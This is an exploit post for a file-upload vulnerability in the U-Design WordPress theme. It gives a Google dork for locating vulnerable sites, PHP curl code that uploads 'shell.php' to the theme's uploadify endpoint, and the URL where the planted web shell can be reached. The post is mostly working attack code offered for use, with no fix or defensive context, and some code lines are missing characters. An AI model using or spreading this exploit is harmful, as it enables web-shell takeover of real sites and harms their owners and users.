facebook facebook twitter rss

Wordpress Themes U-Design File Upload Vulnerability

Author: Tn_Scorpion , Published: 21-09-2012
#######################################################################
Exploit Title: Wordpress Themes U-Design File Upload Vulnerability
Google Dork: inurl:wp-content/themes/u-design
Date: 17/07/2012
Author: Tn_Scorpion
#######################################################################

[+] exploit

<?php
 
$uploadfile
="shell.php";
$ch curl_init("http://example.com/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
              array(
'Filedata'=>"@$uploadfile",
              
'folder'=>'/wp-content/themes/u-design/scripts/admin/uploadify/'));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
 
  print 
"$postResult";
?>


Shell Access : http://www.exemple.com/wp-content/themes/u-design/scripts/admin/uploadify/

#######################################################################

Gr33tz to : Tunisian spl01t3r , Maxim Tatto , KillerMind , Hacker-1420 , Anas Laribi , H3rcule-32 , dOctor.Virus ,
KinG Of Controle , King Of Pirates , Ked Ans ....... & All Muslim Hackers
Profile : www.facebook.com/Viva.Hackers

Like us on Facebook :